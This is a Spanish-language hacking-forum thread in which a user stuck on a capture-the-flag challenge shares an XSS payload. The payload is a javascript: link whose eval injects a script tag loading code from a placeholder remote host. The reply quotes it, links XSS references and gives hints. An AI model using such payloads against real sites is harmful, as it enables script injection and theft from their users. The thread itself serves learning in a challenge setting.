elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  ¿Explotar javascript?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Explotar javascript?  (Leído 2,865 veces)
Sapote

Desconectado Desconectado

Mensajes: 293


Ayuda a un nuevo y ese nuevo algun dia te ayudara


Ver Perfil
¿Explotar javascript?
« en: 10 Octubre 2019, 07:53 am »

Buenas tardes, hacee unos dias entre nuevamente de lleno al tema del hacking, y estoy realizando un par de retos de todo tipo. Ahorita estoy atascado en conseguir una flag.

El punto es el siguiente es un sitio que unicamente tiene un codigo javascript que regresa al mismo sitio.

El javascript es el siguiente

<a href="javascript:openNewWindow('hello.html');">Rompeme</a>


He intentado cambiar el script para intentar sacar un XSS de esta manera

<a href="javascript:eval('var a=document.createElement(\'script\');a.src=\'https://micodigo\';document.body.appendChild(a)')">Rompeme</a>

Al hacerlo obtengo un [object HTMLScriptElement] pero mi sitio no esta capturando nada.

¿Alguien podria darme una mano?


Gracias
Saludos!! ;D

En línea

@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.399


Turn off the red ligth


Ver Perfil WWW
Re: ¿Explotar javascript?
« Respuesta #1 en: 10 Octubre 2019, 09:59 am »

Buenas tardes, hacee unos dias entre nuevamente de lleno al tema del hacking, y estoy realizando un par de retos de todo tipo. Ahorita estoy atascado en conseguir una flag.

El punto es el siguiente es un sitio que unicamente tiene un codigo javascript que regresa al mismo sitio.

El javascript es el siguiente

<a href="javascript:openNewWindow('hello.html');">Rompeme</a>


He intentado cambiar el script para intentar sacar un XSS de esta manera

<a href="javascript:eval('var a=document.createElement(\'script\');a.src=\'https://micodigo\';document.body.appendChild(a)')">Rompeme</a>

Al hacerlo obtengo un [object HTMLScriptElement] pero mi sitio no esta capturando nada.

¿Alguien podria darme una mano?


Gracias
Saludos!! ;D


Estás intentando escribir un objeto en la web, debes escribir la url accediendo a ella (value del objeto).
 
De todas formas no creo que el reto busque que te lo pases así jaja. Me da a mi que el nombre de la función te está diciendo exactamente lo que quiere que hagas. Es obvio UwU. Seguro que te das cuenta:
https://excess-xss.com/
https://portswigger.net/web-security/cross-site-scripting/contexts
https://brutelogic.com.br/blog/alternative-javascript-pseudo-protocol/

Hay algo interesante, se le puede hacer return explicito al pseudoprotocolo. Lo que hace el pseudoprotocolo creo que es retornarte un objeto con la página, asique si lo haces explicitamente debería retornarte el resultado de la expresión directamente. O debería ser así por como está implementado el pseudoproto.
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Explotar Vulnerabilidades CGI
Bugs y Exploits
Tracxus 5 5,021 Último mensaje 12 Enero 2011, 21:08 pm
por berz3k
Creo que voy a explotar
Redes
тαптяα 7 3,232 Último mensaje 29 Agosto 2012, 13:54 pm
por adrianmendezRap
Explotar PHP
Bugs y Exploits
DoHITB 7 5,055 Último mensaje 7 Enero 2013, 20:39 pm
por jdc
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines